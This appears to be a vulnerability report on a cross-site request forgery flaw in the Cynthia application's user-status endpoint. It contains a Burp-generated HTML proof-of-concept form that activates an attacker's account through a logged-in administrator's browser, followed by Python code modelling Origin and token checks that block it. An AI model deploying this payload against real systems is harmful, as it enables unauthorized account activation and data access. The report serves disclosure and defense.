Users can register by themselves, but an administrator has to change the user's status before that user can log in. Because the status-change request has no CSRF protection, an attacker can have a logged-in administrator's browser change the status; afterwards the attacker's account can log in and view the details of all events.
1. Click "System configuration" in the upper right corner, then "User management", then the unlock button.
2. Use Burp Suite to capture the request, then generate a CSRF PoC from it.
3. The response returns true on success.
PoC: change user status
While the administrator is logged in, open the following page:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8080/cynthia_war/user/changeStat.do" method="POST">
<input type="hidden" name="user" value="vq2lumok@qq.com" />
<input type="hidden" name="status" value="normal" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
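The fix belongs on the server: the handler behind /user/changeStat.do must refuse requests that are not demonstrably submitted from the application's own pages. The Python below models the two checks a servlet filter in the Cynthia WAR would perform, an Origin/Referer comparison and a session-bound synchronizer token, and runs the PoC-style request and a legitimate one through them. This is an added example, not Cynthia's code; the allowed origin, the csrf_token field name and the sample requests are assumptions.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Assumption: the origin the Cynthia instance is served from (matches the PoC's target URL).
ALLOWED_ORIGIN = "http://localhost:8080"


def issue_csrf_token(session: dict) -> str:
    """Synchronizer token: a fresh random value stored in the server-side session and
    embedded in every state-changing form rendered for that session."""
    session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def _origin_of(url: str) -> str:
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}"


def is_state_change_allowed(headers: dict, form: dict, session: dict) -> tuple:
    """Two independent checks for a request like POST /user/changeStat.do.
    Returns (allowed, reason)."""
    hdrs = {k.lower(): v for k, v in headers.items()}
    source = hdrs.get("origin") or hdrs.get("referer")
    # Browsers attach Origin (or at least Referer) to cross-site form POSTs, so an
    # auto-submitted form from another site (or "null" from a file:// page) fails here.
    if not source:
        return False, "missing Origin/Referer"
    if _origin_of(source) != ALLOWED_ORIGIN:
        return False, "cross-origin request"
    expected, supplied = session.get("csrf_token"), form.get("csrf_token")
    if not expected or not supplied or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "missing or invalid CSRF token"
    return True, "ok"


def simulate() -> dict:
    """Constructed sample traffic: the PoC above versus a legitimate admin submission."""
    session = {}
    token = issue_csrf_token(session)
    fields = {"user": "vq2lumok@qq.com", "status": "normal"}
    # 1. The PoC: auto-submitted from a page on another origin, no token in the form.
    poc = is_state_change_allowed({"Origin": "http://attacker.example"}, fields, session)
    # 2. Same fields submitted from the admin's own User management page with its token.
    legit = is_state_change_allowed({"Origin": ALLOWED_ORIGIN}, {**fields, "csrf_token": token}, session)
    # 3. Right origin but a token that does not belong to this session (stale or guessed).
    stale = is_state_change_allowed({"Origin": ALLOWED_ORIGIN}, {**fields, "csrf_token": "x"}, session)
    return {"poc": poc, "legit": legit, "stale": stale}
```

The Origin check alone already stops the generated PoC; the token check additionally covers clients that omit both headers and keeps the endpoint safe if the allowed-origin list is ever loosened.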
China Mobile Communications Group Guangxi Co., Ltd.